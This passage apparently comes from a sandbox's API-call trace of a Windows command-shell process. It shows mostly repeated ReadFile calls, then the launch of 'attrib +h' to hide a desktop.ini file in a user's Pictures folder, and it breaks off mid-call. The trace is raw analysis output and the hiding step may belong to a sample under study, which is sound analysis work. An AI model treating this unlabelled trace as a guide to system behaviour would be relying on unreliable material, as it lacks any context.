lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.250] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.251] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.252] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.253] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.254] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.255] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.257] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.330] _close (_FileHandle=4) returned 0 [0144.331] FindNextFileW (in: hFindFile=0x43e6f0, lpFindFileData=0x2ef100 | out: lpFindFileData=0x2ef100) returned 0 [0144.331] GetLastError () returned 0x12 [0144.331] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.331] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0144.335] _close (_FileHandle=3) returned 0 [0144.335] GetConsoleTitleW (in: lpConsoleTitle=0x2ef538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.335] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.335] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.336] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.336] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.337] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0144.337] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0144.337] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.337] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef154, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef21c | out: lpAttributeList=0x2ef154, lpSize=0x2ef21c) returned 1 [0144.337] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef154, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef214, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef154, lpPreviousValue=0x0) returned 1 [0144.337] GetStartupInfoW (in: lpStartupInfo=0x2ef110 | out: lpStartupInfo=0x2ef110*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0144.337] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0144.337] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1fc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessInformation=0x2ef1fc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x878, dwThreadId=0x808)) returned 1 [0144.339] CloseHandle (hObject=0x50) returned 1 [0144.339] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.339] GetEnvironmentStringsW () returned 0x442e20* [0144.339] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.339] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0144.399] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef0f0 | out: lpExitCode=0x2ef0f0*=0x0) returned 1 [0144.399] CloseHandle (hObject=0x4c) returned 1 [0144.399] _vsnwprintf (in: 